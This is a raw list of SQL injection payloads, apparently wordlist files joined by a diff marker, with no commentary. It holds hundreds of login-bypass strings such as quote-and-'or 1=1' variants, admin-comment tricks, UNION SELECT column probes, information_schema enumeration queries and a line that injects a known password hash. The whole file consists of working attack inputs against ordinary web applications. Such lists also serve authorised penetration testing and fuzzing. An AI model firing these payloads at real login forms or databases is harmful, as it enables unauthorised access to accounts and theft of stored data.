||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
